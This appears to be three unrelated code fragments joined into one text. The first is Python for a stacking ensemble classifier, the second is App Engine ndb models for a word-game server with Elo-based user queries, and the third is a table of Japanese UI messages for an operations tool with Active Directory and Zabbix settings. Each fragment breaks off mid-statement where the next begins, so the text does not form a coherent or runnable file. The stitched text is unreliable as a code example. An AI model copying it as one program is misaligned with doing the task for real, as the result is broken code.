{'proba_{}'.format(i): model.predict_proba(X.iloc[self.out_of_fold])[:, 1]}, # noqa
index=self.out_of_fold
)
proba_dfs.append(df_proba)
else: # X is not a dataframe
for i, model in enumerate(self.fitted_models):
df_proba = pd.DataFrame(
{'proba_{}'.format(i): model.predict_proba(X[self.out_of_fold])[:, 1]}, # noqa
index=self.out_of_fold
)
proba_dfs.append(df_proba)
# horizontal concat dfs and revert to origin order
df_out_of_fold_pred = pd.concat(proba_dfs, axis=1)
# if need to convert to predict
if not self.proba:
df_out_of_fold_pred = df_out_of_fold_pred >= 0.5
# Now train ensembler
if not isinstance(y, (pd.Series, pd.DataFrame)):
y = pd.DataFrame(y)
self.ensembler.fit(
X=df_out_of_fold_pred,
y=y.iloc[self.out_of_fold],
*args, **kwargs
)
# signal done fitting
self.fitted = True
return self
def predict_proba(self, X, *args, **kwargs):
check_is_fitted(self, 'fitted')
# use full_trained model or not
if self.full_train:
base_models_list = self.full_fitted_models
else:
base_models_list = self.fitted_models
# get pred from all base models
proba_dfs = []
for i, model in enumerate(base_models_list):
df_proba = pd.DataFrame(
{'proba_{}'.format(i): model.predict_proba(X)[:, 1]}
)
proba_dfs.append(df_proba)
# horizontal concat P1 from all base models
df_base_pred = pd.concat(proba_dfs, axis=1)
if not self.proba:
df_base_pred = df_base_pred >= 0.5
# ensembler make predictions
return self.ensembler.predict_proba(df_base_pred, *args, **kwargs)
def predict(self, X, *args, **kwargs):
df_proba = self.predict_proba(X, *args, **kwargs)[:, 1]
df_pred = df_proba >= 0.5
return force_array(df_pred)
def _base_model_cross_val(model, X, y, cv=None, proba=True, *args, **kwargs):
"""
A private function that trains each base model for each fold
and outputs fitted base models, its out-of-fold predictions,
and array of y (in same order of out-of-fold predictions)
for fitting ensembler
Parameters
----------
model : object, base model
X : array-like, or dataframe
y : array-like, or dataframe
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross validation,
- integer, to specify the number of folds in a `(Stratified)KFold`,
- An object to be used as a cross-validation generator.
- An iterable yielding train, test splits.
proba : bool, if True, model will implement predict_proba when it
gets called
Returns
-------
list of fitted model for each fold, Xt(out-of-fold pred),
y(matched with Xt)
"""
# get list of folds of indices
all_folds = list(check_cv(cv).split(X, y))
# check data type
if not isinstance(X, (pd.DataFrame, pd.Series)):
X = pd.DataFrame(force_array(X))
if not isinstance(y, (pd.DataFrame, pd.Series)):
y = pd.DataFrame(force_array(y))
# iterate each train-fold and fit base model
fitted_models = [
fit_model(
model=deepcopy(model),
X=X.iloc[train],
y=y.iloc[train],
*args,
**kwargs
) for train, test in all_folds
]
# generate out-of-sample predictions and reserve same order!!
proba_dfs = []
for i, (train, test) in enumerate(all_folds):
df_proba = pd.DataFrame(
{'proba': fitted_models[i].predict_proba(X.iloc[test])[:, 1]}, # noqa
index=test
)
proba_dfs.append(df_proba)
# concat dfs, sort index, and record index
df_out_of_sample = pd.concat(proba_dfs).sort_index()
idx = df_out_of_sample.index.values
# get pred_out_of_sample
pred_out_of_sample = \
force_array(df_out_of_sample).reshape((len(df_out_of_sample), 1))
# if need to convert to predict
if not proba:
pred_out_of_sample | |
1
if 0 < max_len <= counter:
# Hit limit on returned users: stop iterating
return
# Return users with full names matching the prefix
q = cls.query(UserModel.name_lc >= prefix).order(UserModel.name_lc)
for ud in list_q(q, lambda um: um.name_lc or ""):
yield ud
counter += 1
if 0 < max_len <= counter:
# Hit limit on returned users: stop iterating
return
@classmethod
def list_similar_elo(cls, elo, max_len=40):
""" List users with a similar (human) Elo rating """
# Start with max_len users with a lower Elo rating
def fetch(q, max_len):
""" Generator for returning query result keys """
assert max_len > 0
# pylint: disable=bad-continuation
counter = 0 # Number of results already returned
for k in iter_q(
q, chunk_size=max_len, projection=['highest_score']
):
if k.highest_score > 0:
# Has played at least one game: Yield the key value
yield k.key.id()
counter += 1
if counter >= max_len:
# Returned the requested number of records: done
return
q = cls.query(UserModel.human_elo < elo).order(
-UserModel.human_elo # Descending order
)
lower = list(fetch(q, max_len))
# Convert to an ascending list
lower.reverse()
# Repeat the query for same or higher rating
q = cls.query(UserModel.human_elo >= elo).order(
UserModel.human_elo # Ascending order
)
higher = list(fetch(q, max_len))
# Concatenate the upper part of the lower range with the
# lower part of the higher range in the most balanced way
# available (considering that either of the lower or upper
# ranges may be empty or have fewer than max_len//2 entries)
len_lower = len(lower)
len_higher = len(higher)
# Ideal balanced length from each range
half_len = max_len // 2
ix = 0 # Default starting index in the lower range
if len_lower >= half_len:
# We have enough entries in the lower range for a balanced result,
# if the higher range allows
# Move the start index
ix = len_lower - half_len
if len_higher < half_len:
# We don't have enough entries in the upper range
# to balance the result: move the beginning index down
if ix >= half_len - len_higher:
# Shift the entire missing balance to the lower range
ix -= half_len - len_higher
else:
# Take as much slack as possible
ix = 0
# Concatenate the two slices into one result and return it
assert max_len >= (len_lower - ix)
result = lower[ix:] + higher[0:max_len - (len_lower - ix)]
return result
class MoveModel(ndb.Model):
""" Models a single move in a Game """
coord = ndb.StringProperty()
tiles = ndb.StringProperty()
score = ndb.IntegerProperty(default=0)
rack = ndb.StringProperty(required=False, default=None)
timestamp = ndb.DateTimeProperty(required=False, default=None)
class GameModel(ndb.Model):
""" Models a game between two users """
# The players
player0 = ndb.KeyProperty(kind=UserModel)
player1 = ndb.KeyProperty(kind=UserModel)
# The racks
rack0 = ndb.StringProperty()
rack1 = ndb.StringProperty()
# The scores
score0 = ndb.IntegerProperty()
score1 = ndb.IntegerProperty()
# Whose turn is it next, 0 or 1?
to_move = ndb.IntegerProperty()
# How difficult should the robot player be (if the opponent is a robot)?
# None or 0 = most difficult
robot_level = ndb.IntegerProperty(required=False, indexed=False, default=0)
# Is this game over?
over = ndb.BooleanProperty()
# When was the game started?
timestamp = ndb.DateTimeProperty(auto_now_add=True)
# The timestamp of the last move in the game
ts_last_move = ndb.DateTimeProperty(required=False, default=None)
# The moves so far
moves = ndb.LocalStructuredProperty(
MoveModel, repeated=True, indexed=False)
# The initial racks
irack0 = ndb.StringProperty(required=False, default=None)
irack1 = ndb.StringProperty(required=False, default=None)
# Game preferences, such as duration, alternative bags or boards, etc.
prefs = ndb.JsonProperty(required=False, default=None)
# Count of tiles that have been laid on the board
tile_count = ndb.IntegerProperty(
required=False, indexed=False, default=None)
# Elo statistics properties - only defined for finished games
# Elo points of both players when game finished, before adjustment
elo0 = ndb.IntegerProperty(required=False, indexed=False, default=None)
elo1 = ndb.IntegerProperty(required=False, indexed=False, default=None)
# Adjustment of Elo points of both players as a result of this game
elo0_adj = ndb.IntegerProperty(required=False, indexed=False, default=None)
elo1_adj = ndb.IntegerProperty(required=False, indexed=False, default=None)
# Human-only Elo points of both players when game finished
# (not defined if robot game)
human_elo0 = ndb.IntegerProperty(
required=False, indexed=False, default=None)
human_elo1 = ndb.IntegerProperty(
required=False, indexed=False, default=None)
# Human-only Elo point adjustment as a result of this game
human_elo0_adj = ndb.IntegerProperty(
required=False, indexed=False, default=None)
human_elo1_adj = ndb.IntegerProperty(
required=False, indexed=False, default=None)
def set_player(self, ix, user_id):
""" Set a player key property to point to a given user, or None """
k = None if user_id is None else ndb.Key(UserModel, user_id)
if ix == 0:
self.player0 = k
elif ix == 1:
self.player1 = k
@classmethod
def fetch(cls, game_uuid, use_cache=True):
""" Fetch a game entity given its uuid """
if not use_cache:
return cls.get_by_id(game_uuid, use_cache=False, use_global_cache=False)
# Default caching policy if caching is not explictly prohibited
return cls.get_by_id(game_uuid)
@classmethod
def list_finished_games(cls, user_id, versus=None, max_len=10):
""" Query for a list of recently finished games for the given user """
assert user_id is not None
if user_id is None:
return []
def game_callback(gm):
""" Map a game entity to a result dictionary with useful info about the game """
game_uuid = gm.key.id()
u0 = None if gm.player0 is None else gm.player0.id()
u1 = None if gm.player1 is None else gm.player1.id()
if u0 == user_id:
# Player 0 is the source player, 1 is the opponent
opp = u1
sc0, sc1 = gm.score0, gm.score1
elo_adj = gm.elo0_adj
human_elo_adj = gm.human_elo0_adj
else:
# Player 1 is the source player, 0 is the opponent
assert u1 == user_id
opp = u0
sc1, sc0 = gm.score0, gm.score1
elo_adj = gm.elo1_adj
human_elo_adj = gm.human_elo1_adj
return dict(
uuid=game_uuid,
ts=gm.timestamp,
ts_last_move=gm.ts_last_move or gm.timestamp,
opp=opp,
robot_level=gm.robot_level,
sc0=sc0,
sc1=sc1,
elo_adj=elo_adj,
human_elo_adj=human_elo_adj,
prefs=gm.prefs
)
k = ndb.Key(UserModel, user_id)
if versus:
# Add a filter on the opponent
v = ndb.Key(UserModel, versus)
q0 = cls.query(ndb.AND(GameModel.player1 ==
k, GameModel.player0 == v))
q1 = cls.query(ndb.AND(GameModel.player0 ==
k, GameModel.player1 == v))
else:
# Plain filter on the player
q0 = cls.query(GameModel.player0 == k)
q1 = cls.query(GameModel.player1 == k)
# pylint: disable=singleton-comparison
q0 = q0.filter(GameModel.over == True).order(-GameModel.ts_last_move)
q1 = q1.filter(GameModel.over == True).order(-GameModel.ts_last_move)
# Issue two asynchronous queries in parallel
qf = (q0.fetch_async(max_len), q1.fetch_async(max_len))
# Wait for both of them to finish
ndb.Future.wait_all(qf)
# Combine the two query result lists and call game_callback() on each item
rlist = map(game_callback, qf[0].get_result() + qf[1].get_result())
# Return the newest max_len games
return sorted(rlist, key=lambda x: x["ts_last_move"], reverse=True)[0:max_len]
@classmethod
def iter_live_games(cls, user_id, max_len=10):
""" Query for a list of active games for the given user """
assert user_id is not None
if user_id is None:
return
k = ndb.Key(UserModel, user_id)
# pylint: disable=singleton-comparison
q = (
cls
.query(ndb.OR(GameModel.player0 == k, GameModel.player1 == k))
.filter(GameModel.over == False)
.order(-GameModel.ts_last_move)
)
def game_callback(gm):
""" Map a game entity to a result tuple with useful info about the game """
game_uuid = gm.key.id()
u0 = None if gm.player0 is None else gm.player0.id()
u1 = None if gm.player1 is None else gm.player1.id()
if u0 == user_id:
# Player 0 is the source player, 1 is the opponent
opp = u1
sc0, sc1 = gm.score0, gm.score1
my_turn = gm.to_move == 0
else:
# Player 1 is the source player, 0 is the opponent
assert u1 == user_id
opp = u0
sc1, sc0 = gm.score0, gm.score1
my_turn = gm.to_move == 1
# Obtain a count of the tiles that have been laid down
tc = gm.tile_count
if tc is None:
# Not stored: we must count the tiles manually
# This will not be 100% accurate as tiles will be double-counted
# if they are a part of two words
tc = 0
for m in gm.moves:
if m.coord:
# Normal tile move
tc += len(m.tiles.replace(u'?', u''))
return dict(
uuid=game_uuid,
ts=gm.ts_last_move or gm.timestamp,
opp=opp,
robot_level=gm.robot_level,
my_turn=my_turn,
sc0=sc0,
sc1=sc1,
prefs=gm.prefs,
tile_count=tc
)
for gm in q.fetch(max_len):
yield game_callback(gm)
class FavoriteModel(ndb.Model):
""" Models the fact that a user has marked another user as a favorite """
MAX_FAVORITES = 100 # The maximum number of favorites that a user can have
# The originating (source) user | |
\n00から23の数値を入力してください。"
Ary['MOSEN22030'] = "AD連携タイマーの設定に失敗しました。"
Ary['MOSEN22031'] = "メール通知種別を選択してください。"
Ary['MOSEN22032'] = "ログインIDが不正です。修正してください。"
Ary['MOSEN22033'] = "AD連携解除を行っています。"
Ary['MOSEN22034'] = "処理が終了しました。"
Ary['MOSEN22035'] = "システム設定が保存されました。"
Ary['MOSEN22036'] = "存在しないログインIDが入力されています。(%(ids)s) 修正してください。"
Ary['MOSEN22037'] = "初回AD連携処理を行っています。処理が完了するまで、ブラウザを閉じたり、別ページに移動しないでください"
Ary['MOSEN22038'] = "AD連携解除に失敗しました。"
Ary['MOSEN22039'] = "初回AD連携に失敗しました。設定情報と接続先に問題がないか確認してください。"
Ary['MOSEN22040'] = "AD連携設定を行います。\n現在登録中のグループ・ユーザ情報が全て削除され、\nADから取得したグループ・ユーザを設定します。\nよろしいですか?"
Ary['MOSEN22041'] = "AD連携設定中です。"
Ary['MOSEN22042'] = "AD連携を中断しました。"
Ary['MOSEN22043'] = "入力情報が破棄されます。よろしいですか?"
Ary['MOSEN22044'] = "システム設定"
Ary['MOSEN22045'] = "ログ設定"
Ary['MOSEN22046'] = "認証設定"
Ary['MOSEN22047'] = "パスワード設定"
Ary['MOSEN22048'] = "Active Directory設定"
Ary['MOSEN22049'] = "ログ保存期間設定"
Ary['MOSEN22050'] = "日"
Ary['MOSEN22051'] = "セッション設定"
Ary['MOSEN22052'] = "分"
Ary['MOSEN22053'] = "パスワード関連設定"
Ary['MOSEN22054'] = "日間"
Ary['MOSEN22055'] = "世代"
Ary['MOSEN22056'] = "回"
Ary['MOSEN22057'] = "時間"
Ary['MOSEN22058'] = "管理者(administrator)のみ"
Ary['MOSEN22059'] = "管理者(administrator)+ユーザ更新権限のあるユーザ"
Ary['MOSEN22060'] = "管理者(administrator)+ログインID指定"
Ary['MOSEN22061'] = "Active Directory関連設定"
Ary['MOSEN22062'] = "未連携"
Ary['MOSEN22063'] = "連携中"
Ary['MOSEN22064'] = "属性値"
Ary['MOSEN22065'] = "所属部署名"
Ary['MOSEN22066'] = "秒"
Ary['MOSEN22067'] = "全てリセット"
Ary['MOSEN22068'] = "行追加"
Ary['MOSEN22069'] = "行削除"
Ary['MOSEN22070'] = "AD連携設定"
Ary['MOSEN22071'] = "エラー"
Ary['MOSEN22072'] = "無効"
Ary['MOSEN23000'] = "グループ"
Ary['MOSEN23001'] = "グループが存在しません。<br />権限がある場合は、[編集]をクリックするとグループを作成できます。"
Ary['MOSEN23002'] = "権限"
Ary['MOSEN23003'] = "グループ名"
Ary['MOSEN23004'] = "概要"
Ary['MOSEN23005'] = "最終更新者"
Ary['MOSEN23006'] = "最終更新日時"
Ary['MOSEN23007'] = "対象データがありません。"
Ary['MOSEN23008'] = "更新"
Ary['MOSEN23009'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN23010'] = "リセットします。\nよろしいですか?"
Ary['MOSEN23011'] = "必須項目(グループ名)が入力されていません。入力してください。"
Ary['MOSEN23012'] = "グループ名は64文字以内で入力してください。"
Ary['MOSEN23013'] = "概要は4000文字以内で入力してください。"
Ary['MOSEN23014'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN23015'] = "更新対象のデータがありません。"
Ary['MOSEN23016'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN23017'] = "エラーが発生しました。"
Ary['MOSEN23018'] = "データ取得に失敗しました。"
Ary['MOSEN23019'] = "不正なリクエストです。"
Ary['MOSEN23020'] = "他のグループ名と重複しています。修正してください。"
Ary['MOSEN23021'] = "DBの更新に失敗しました。"
Ary['MOSEN23022'] = "グループが存在しません。<br />Active Directoryでグループ作成をしてください。"
Ary['MOSEN23023'] = "のグループは削除が選択されています。\n所属するグループがなくなったユーザも削除されます。\n\n保存してもよろしいですか?"
Ary['MOSEN23024'] = "%(strCol)sに使用できない文字が含まれています。"
Ary['MOSEN23025'] = "グループ名「システム管理者」は変更できません。"
Ary['MOSEN23026'] = "アクセス権限を変更します。"
Ary['MOSEN23027'] = "変更内容を保存しますか?"
Ary['MOSEN23028'] = "アクセス権限"
Ary['MOSEN23029'] = "権限の設定"
Ary['MOSEN23030'] = "システム"
Ary['MOSEN23031'] = "System Settngs"
Ary['MOSEN23032'] = "User"
Ary['MOSEN23033'] = "Action Settings"
Ary['MOSEN23034'] = "システム管理者"
Ary['MOSEN23035'] = "全て表示"
Ary['MOSEN23036'] = "監視アダプタ"
Ary['MOSEN23037'] = "グループ名に使用できない文字が含まれています。"
Ary['MOSEN23038'] = "概要に使用できない文字が含まれています。"
Ary['MOSEN24000'] = "不正なリクエストです。"
Ary['MOSEN24001'] = "データ取得に失敗しました。"
Ary['MOSEN24002'] = "入力値が不正です。"
Ary['MOSEN24003'] = "対象データがありません。"
Ary['MOSEN24004'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN24005'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN24006'] = "必須項目(ログインID)が入力されていません。入力してください。"
Ary['MOSEN24007'] = "必須項目(メールアドレス)が入力されていません。入力してください。"
Ary['MOSEN24008'] = "必須項目(グループ)が選択されていません。選択してください。"
Ary['MOSEN24009'] = "ユーザが存在しません。<br />Active Directoryでユーザ作成をしてください。"
Ary['MOSEN24010'] = "ユーザが存在しません。<br />権限がある場合は、[編集]をクリックするとユーザを作成できます。"
Ary['MOSEN24011'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN24012'] = "ログインIDは32文字以内で入力してください。"
Ary['MOSEN24013'] = "メールアドレスは256文字以内で入力してください。"
Ary['MOSEN24014'] = "メールアドレスが不正です。修正してください。"
Ary['MOSEN24015'] = "エラーが発生しました。"
Ary['MOSEN24016'] = "存在しないグループを追加しようとしています。"
Ary['MOSEN24017'] = "他のログインIDと重複しています。修正してください。"
Ary['MOSEN24018'] = "他のメールアドレスと重複しています。修正してください。"
Ary['MOSEN24019'] = "存在しないグループを削除しようとしています。"
Ary['MOSEN24020'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN24021'] = "ログインIDが不正です。使用可能文字は半角英字(大文字)、半角英字(小文字)、半角数字、記号 . @ _ -です。"
Ary['MOSEN24022'] = "%(strConName)sに使用できない文字が含まれています。"
Ary['MOSEN24023'] = "グループ画面で作成したグループを選択してください。\n1ユーザに対して複数のグループを紐付することができます。"
Ary['MOSEN24024'] = "ユーザ"
Ary['MOSEN24025'] = "グループの選択"
Ary['MOSEN24026'] = "ユーザ名:"
Ary['MOSEN24027'] = "所属するグループを選択してください。"
Ary['MOSEN24028'] = "グループ"
Ary['MOSEN24029'] = "グループを選択してください。"
Ary['MOSEN25000'] = "メールテンプレートが存在しません。<br />権限がある場合は、[新規追加]をクリックするとメールテンプレートを作成できます。"
Ary['MOSEN25001'] = "対象データがありません。"
Ary['MOSEN25002'] = "更新対象のデータがありません。"
Ary['MOSEN25003'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN25004'] = "必須項目(テンプレート名)が入力されていません。"
Ary['MOSEN25005'] = "必須項目(件名)が入力されていません。"
Ary['MOSEN25006'] = "必須項目(本文)が入力されていません。"
Ary['MOSEN25007'] = "テンプレート名は64文字以内で入力してください。"
Ary['MOSEN25008'] = "件名は128文字以内で入力してください。"
Ary['MOSEN25009'] = "本文は512文字以内で入力してください。"
Ary['MOSEN25010'] = "宛先は512文字以内で入力してください。"
Ary['MOSEN25011'] = "CCは512文字以内で入力してください。"
Ary['MOSEN25012'] = "BCCは512文字以内で入力してください。"
Ary['MOSEN25013'] = "他のテンプレート名と重複しています。修正してください。"
Ary['MOSEN25014'] = "宛先のメールアドレスが不正です。修正してください。"
Ary['MOSEN25015'] = "CCのメールアドレスが不正です。修正してください。"
Ary['MOSEN25016'] = "BCCのメールアドレスが不正です。修正してください。"
Ary['MOSEN25017'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN25018'] = "エラーが発生しました。"
Ary['MOSEN25019'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN25020'] = "テンプレート名に使用できない文字が含まれています。"
Ary['MOSEN25021'] = "件名に使用できない文字が含まれています。"
Ary['MOSEN25022'] = "本文に使用できない文字が含まれています。"
Ary['MOSEN25023'] = "宛先に使用できない文字が含まれています。"
Ary['MOSEN25024'] = "CCに使用できない文字が含まれています。"
Ary['MOSEN25025'] = "BCCに使用できない文字が含まれています。"
Ary['MOSEN25026'] = "アクション設定に戻る"
Ary['MOSEN25027'] = "件名"
Ary['MOSEN25028'] = "メールテンプレート新規追加"
Ary['MOSEN25029'] = "テンプレート名"
Ary['MOSEN25030'] = "宛先"
Ary['MOSEN25031'] = "CC"
Ary['MOSEN25032'] = "BCC"
Ary['MOSEN25033'] = "本文"
Ary['MOSEN25034'] = "メールテンプレート詳細"
Ary['MOSEN25035'] = "メールテンプレート編集"
Ary['MOSEN25036'] = "この内容で保存して宜しいですか?\n保存しない場合は、[キャンセル]をクリックしてください。"
Ary['MOSEN25037'] = "メールテンプレートを削除して宜しいですか?\n削除しない場合は、[キャンセル]をクリックしてください。"
Ary['MOSEN26001'] = "保存されました。"
Ary['MOSEN26002'] = "入力値が不正です。"
Ary['MOSEN26003'] = "エラーが発生しました。"
Ary['MOSEN26004'] = "監視アダプタ"
Ary['MOSEN26005'] = "監視先の追加"
Ary['MOSEN26006'] = "監視先の選択"
Ary['MOSEN26007'] = "アダプタがインストールされていません。<br />アダプタをインストールすると監視情報が表示されます。"
Ary['MOSEN26008'] = "データ取得に失敗しました。"
Ary['MOSEN26009'] = "不正なリクエストです。"
Ary['MOSEN26010'] = "DBの更新に失敗しました。"
Ary['MOSEN26011'] = "戻る"
Ary['MOSEN26101'] = "データの削除に失敗しました。"
Ary['MOSEN26102'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN26103'] = "名前は64文字以内で入力してください。"
Ary['MOSEN26104'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN26105'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN26106'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN26107'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN26108'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN26109'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN26110'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN26111'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN26112'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN26113'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN26114'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN26115'] = "必須項目(パスワード)が入力されていません。入力してください。"
Ary['MOSEN26116'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN26117'] = "パスワードに使用できない文字が含まれています。"
Ary['MOSEN26118'] = "必須項目(ルール種別)が選択されていません。選択してください。"
Ary['MOSEN26119'] = "ルール種別が存在しません。ディシジョンテーブル画面からファイルをダウンロードし、ルールの設定を行ってください。"
Ary['MOSEN26120'] = "必須項目(条件名)が入力されていません。入力してください。"
Ary['MOSEN26121'] = "保存されている条件名の数と入力されたZabbix項目の数が違います。もう一度お試しください。再度同じエラーが発生している場合はOASEシステムの管理者へご連絡ください。"
Ary['MOSEN26122'] = "必須項目(Zabbix項目)が入力されていません。入力してください。"
Ary['MOSEN26123'] = "Zabbix項目に使用できない文字が含まれています。"
Ary['MOSEN26124'] = "他のZABBIXアダプタ名と重複しています。修正してください。"
Ary['MOSEN26125'] = "他のホスト名と重複しています。修正してください。"
Ary['MOSEN26126'] = "ZABBIXの疎通確認に失敗しました。"
Ary['MOSEN26127'] = "データは既に削除されています。再読み込みしてください。"
Ary['MOSEN26128'] = "Zabbix項目は32文字以内で入力してください。"
Ary['MOSEN26129'] = "名前"
Ary['MOSEN26130'] = "プロトコル"
Ary['MOSEN26131'] = "ホスト/IP"
Ary['MOSEN26132'] = "ポート"
Ary['MOSEN26133'] = "ユーザ名"
Ary['MOSEN26134'] = "ルール種別"
Ary['MOSEN26135'] = "突合情報"
Ary['MOSEN26136'] = "条件名"
Ary['MOSEN26137'] = "Zabbix項目"
Ary['MOSEN26138'] = "パスワード"
Ary['MOSEN26139'] = "ルール種別選択"
Ary['MOSEN26140'] = "ルール種別を選択してください。"
Ary['MOSEN26141'] = "未入力エラー"
Ary['MOSEN26142'] = "ルールが削除されています。ルールを選び直してください。"
Ary['MOSEN26143'] = "監視先が設定されていません。<br />権限がある場合は、[監視先の追加]をクリックすると設定編集できます。"
Ary['MOSEN26144'] = "条件に対応させるZabbix項目名を入力してください。"
Ary['MOSEN26145'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN26146'] = "削除すると設定されている監視基盤へのメッセージ取得を行わなくなります。\n保存してもよろしいですか?"
Ary['MOSEN26147'] = "Zabbix項目に設定されていない文字が指定されています。"
Ary['MOSEN27001'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN27002'] = "のアクション設定は削除が選択されています。\nルールに記載されているアクションでも実行できなくなります。\n\n保存してもよろしいですか?"
Ary['MOSEN27003'] = "入力値が不正です。"
Ary['MOSEN27004'] = "対象データがありません。"
Ary['MOSEN27005'] = "エラーが発生しました。"
Ary['MOSEN27006'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN27007'] = "アクション用ドライバが設定されていません。"
Ary['MOSEN27008'] = "データ取得に失敗しました。"
Ary['MOSEN27009'] = "DBの更新に失敗しました。"
Ary['MOSEN27010'] = "不正なリクエストです。"
Ary['MOSEN27011'] = "アクション設定が存在しません。<br />権限がある場合は、[編集]をクリックすると設定編集できます。"
Ary['MOSEN27012'] = "アクション設定が存在しません。<br />追加したいdriverを選択し、[追加]をクリックして設定してください。"
Ary['MOSEN27013'] = "ドライバーがインストールされていません。<br />ドライバーをインストールするとアクション設定情報が表示されます。"
Ary['MOSEN27014'] = "アクション先が設定されていません。<br />権限がある場合は、[アクション先の追加]をクリックすると設定編集できます。"
Ary['MOSEN27015'] = "アクション設定"
Ary['MOSEN27016'] = "アクション先の追加"
Ary['MOSEN27017'] = "アクション先の選択"
Ary['MOSEN27018'] = "名前"
Ary['MOSEN27019'] = "プロトコル"
Ary['MOSEN27020'] = "ホスト/IP"
Ary['MOSEN27021'] = "ポート"
Ary['MOSEN27022'] = "ユーザ名"
Ary['MOSEN27023'] = "パスワード"
Ary['MOSEN27024'] = "戻る"
Ary['MOSEN27025'] = "smtpサーバ"
Ary['MOSEN27026'] = "削除するとルールに記載されているアクションでも実行できなくなります。\n保存してもよろしいですか?"
Ary['MOSEN27027'] = "編集可能なグループが存在しません。"
Ary['MOSEN27028'] = "設定値"
Ary['MOSEN27029'] = "現在の設定値"
Ary['MOSEN27101'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN27102'] = "名前は64文字以内で入力してください。"
Ary['MOSEN27103'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN27104'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN27105'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN27106'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN27107'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN27108'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN27109'] = "必須項目(パスワード)が入力されていません。入力してください。"
Ary['MOSEN27110'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN27111'] = "他のITAアクション名と重複しています。修正してください。"
Ary['MOSEN27112'] = "他のホスト名と重複しています。修正してください。"
Ary['MOSEN27113'] = "2つのパスワード入力が一致していません。同じパスワードを入力してください。"
Ary['MOSEN27115'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN27116'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN27118'] = "保存されました。"
Ary['MOSEN27119'] = "ITAの疎通確認に失敗しました。"
Ary['MOSEN27120'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN27121'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN27122'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN27123'] = "パスワードに使用できない文字が含まれています。"
Ary['MOSEN27201'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN27202'] = "名前は64文字以内で入力してください。"
Ary['MOSEN27203'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN27204'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN27205'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN27206'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN27207'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN27208'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN27209'] = "他のメールアクション名と重複しています。修正してください。"
Ary['MOSEN27212'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN27213'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN27214'] = "DBの更新に失敗しました。"
Ary['MOSEN27215'] = "mailの疎通確認に失敗しました。"
Ary['MOSEN27216'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN27217'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN27218'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN27219'] = "パスワードに使用できない文字が含まれています。"
Ary['MOSEN27220'] = "2つのパスワード入力が一致していません。同じパスワードを入力してください。"
Ary['MOSEN27300'] = "アクション設定に戻る"
Ary['MOSEN27301'] = "ドライバ名"
Ary['MOSEN27302'] = "メニューグループID"
Ary['MOSEN27303'] = "メニューID"
Ary['MOSEN27304'] = "パラメータ名"
Ary['MOSEN27305'] = "順序"
Ary['MOSEN27306'] = "抽出対象条件名"
Ary['MOSEN27307'] = "抽出方法1"
Ary['MOSEN27308'] = "抽出方法2"
Ary['MOSEN27309'] = "メッセージ抽出定義が存在しません。<br>権限がある場合は、[編集]をクリックするとメッセージ抽出定義を登録することができます。"
Ary['MOSEN27310'] = "リクエストが不正です。"
Ary['MOSEN27311'] = "DBの更新に失敗しました。"
Ary['MOSEN27312'] = "更新対象のレコードは既に削除されています。"
Ary['MOSEN27313'] = "指定のドライバ名は存在しません。"
Ary['MOSEN27314'] = "ドライバ名、メニューグループID、メニューID、順序の組み合わせが重複しています。一意の値を指定してください。"
Ary['MOSEN27315'] = "必須項目(ドライバ名)が選択されていません。選択してください。"
Ary['MOSEN27316'] = "必須項目(メニューグループID)が入力されていません。入力してください。"
Ary['MOSEN27317'] = "必須項目(メニューグループ:メニュー)が選択されていません。選択してください。"
